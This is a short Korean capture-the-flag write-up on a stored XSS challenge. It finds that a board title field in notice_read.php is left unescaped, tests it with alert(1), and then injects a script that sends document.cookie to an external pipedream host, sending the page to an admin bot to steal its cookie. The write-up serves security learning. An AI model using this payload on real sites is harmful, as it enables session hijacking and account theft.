[CTF] XSS1

CHIKA·2024년 6월 26일

📌
XSS (Cross Site Scripting)
Cookie 탈취

취약점 설명 : Stored XSS
취약점 발생 위치 : notice_read.php

회원가입 후 로그인

게시판이 있으니 글부터 써봤습니다.

특수문자 삽입이 가능한지 확인하기 위해 제목,내용에 모두 test<'">를 넣어봄.

작성한 게시글 클릭해서보니

contents와 달리 title은 Html Entity 치환이 안된 것을 확인함.

꺽쇠를 넣을 수 있으니 스크립트를 넣어봄.
작동여부 확인부터 하기위해 <script>alert(1)</script>을 삽입.

작성한 게시물 클릭하면 잘 작동하는 것을 확인!

스크립트가 잘 작동하니 쿠키탈취코드를 넣고 게시물을 클릭해봄.

<script>var cookieData = document.cookie;var i =new Image();i.src = "https://en2hyoic3j7mi.x.pipedream.net/?cookie=" + cookieData;</script>

공격자 서버로 쿠키값이 제대로 넘어오고 있다!

쿠키값이 나오지 않는다면 alert(document.cookie)를 찍어보고 빈 창이 출력되면
https://velog.io/@dmkr9845/document.cookie-%EC%95%88%EB%90%A8
글을 참고하자.

관리자Bot에게 해당 페이지 URL을 보내서 쿠키값이 넘어오면 성공!